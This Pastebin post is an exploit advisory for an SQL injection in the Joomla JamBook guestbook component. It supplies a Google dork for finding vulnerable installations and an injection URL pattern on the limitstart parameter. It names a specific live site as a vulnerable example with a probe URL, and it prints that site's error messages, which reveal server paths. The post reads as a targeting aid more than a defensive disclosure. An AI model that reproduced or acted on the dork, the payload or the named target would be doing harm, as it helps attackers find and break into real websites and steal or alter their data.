Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla JamBook Components 1.5 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 01/02/2019
- # Vendor Homepage : joomlacode.org
- # Software Download Link : joomlacode.org/gf/project/jambook/
- # Software Version : 1.0 and 1.5
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_jambook''
- Developed by MATspot.net. Optimised for Mozilla Firefox
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Jambook is a feature rich open source Joomla guestbook component with spam
- protection, email address cloaking, flood protection, double posting checks
- and the ability to use Joomla wysiwyg editor, even for guests!
- It shows guestbook entries from the Jambook component.
- It has been written from scratch to be easy to use and
- yet have powerful functionality for the administrator.
- Two extra extensions for Jambook released.
- Jx Show Jambook
- This module allows you to list Jambook entries elsewhere on your site.
- Jx Jambook Search
- A search plugin (mambot) to add Jambook search to the standard Joomla search.
- ####################################################################
- # Impact :
- ***********
- Joomla JamBook Components 1.5 component for Joomla! is
- prone to an SQL-injection vulnerability because it fails to sufficiently
- sanitize user-supplied data before using it in an SQL query.
- A successful exploit may allow an attacker to compromise the application, access
- or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_jambook&Itemid=[ID-NUMBER]&task=list&sort=createddesc&limit=[ID-NUMBER]&limitstart=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] eden.rs.ba/index.php?option=com_jambook&Itemid=31
- &task=list&sort=createddesc&limit=5&limitstart=200%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Deprecated: Assigning the return value of new by reference is deprecated
- in /home/diskocic/public_html/eden.rs.ba/includes/joomla.php on line 836
- Deprecated: preg_replace(): The /e modifier is deprecated, use
- preg_replace_callback instead in /home/diskocic/public_html
- /eden.rs.ba/includes/phpInputFilter/class.inputfilter.php on line 457
- Deprecated: Function split() is deprecated in
- /home/diskocic/public_html/eden.rs.ba/includes/joomla.php on line 1527
- Deprecated: Function eregi() is deprecated in
- /home/diskocic/public_html/eden.rs.ba/includes/sef.php on line 533
- Warning: Cannot modify header information - headers already sent by
- (output started at /home/diskocic/public_html/eden.rs.ba/includes
- /joomla.php:836) in /home/diskocic/public_html/eden.rs.ba
- /includes/joomla.php on line 697
- Strict Standards: Non-static method mosCache::getCache()
- should not be called statically in /home/diskocic/public_html
- /eden.rs.ba/includes/frontend.php on line 199
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment